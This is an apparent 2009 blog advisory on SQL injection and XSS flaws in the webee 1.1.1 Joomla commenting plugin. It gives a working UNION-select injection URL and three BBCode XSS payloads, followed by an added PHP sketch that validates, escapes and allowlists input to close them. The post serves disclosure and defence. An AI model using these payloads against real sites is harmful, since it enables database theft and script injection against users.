jeffchannell.com

webee 1.1.1 Multiple Vulnerabilities

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' parameter is not sanitized.
    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 -- 
  2. [img] BBCode [color] Tag XSS

    [color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
  3. [url] BBCode [img] Tag XSS

    [img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
  4. [size] BBCode [url] Tag XSS

    [url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]
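
One way to close all four issues, as an added example that is not webee's code and not part of the original advisory. The helper names (clean_article_id, esc, safe_url, render_bbcode) are hypothetical, and it assumes comments pass through a single rendering function before output.

```php
<?php
// Added example: hypothetical helpers, not webee's own code.

// Item 1: accept articleId only when the whole value is a positive integer.
function clean_article_id(string $raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// http(s) only, and no character that could end an attribute or open a tag.
function safe_url(string $escaped): ?string {
    $u = htmlspecialchars_decode($escaped, ENT_QUOTES);
    return preg_match('~^https?://[^\s"\'<>\[\]]+$~i', $u) ? esc($u) : null;
}

// Items 2-4: escape the whole comment first, then rebuild a tag only when
// its argument passes an allowlist; a rejected tag stays as inert text.
function render_bbcode(string $text): string {
    $out = esc($text);
    $out = preg_replace_callback('~\[color=([^\]]*)\](.*?)\[/color\]~is', function ($m) {
        // Named colour or #hex only: no ';', ':' or '(' can reach the style.
        return preg_match('~^(#[0-9a-f]{3,6}|[a-z]{3,20})$~i', $m[1])
            ? '<span style="color:' . $m[1] . '">' . $m[2] . '</span>' : $m[0];
    }, $out);
    $out = preg_replace_callback('~\[img\](.*?)\[/img\]~is', function ($m) {
        $u = safe_url($m[1]);
        return $u !== null ? '<img src="' . $u . '" alt="">' : $m[0];
    }, $out);
    return preg_replace_callback('~\[url=([^\]]*)\](.*?)\[/url\]~is', function ($m) {
        $u = safe_url($m[1]);
        return $u !== null ? '<a href="' . $u . '" rel="nofollow">' . $m[2] . '</a>' : $m[0];
    }, $out);
}

// The page's own strings as input, plus one constructed benign comment.
var_dump(clean_article_id('999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 -- '));
var_dump(clean_article_id('999'));
foreach ([
    '[color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]',
    '[img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]',
    '[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]',
    '[color=red]hi[/color] [url=http://example.com/]link[/url]',  // constructed
] as $comment) {
    echo render_bbcode($comment), "\n";
}
```

The validated integer should still be passed to the database as a bound parameter or an integer cast, not concatenated into the query as a string.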

UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2.

Timeline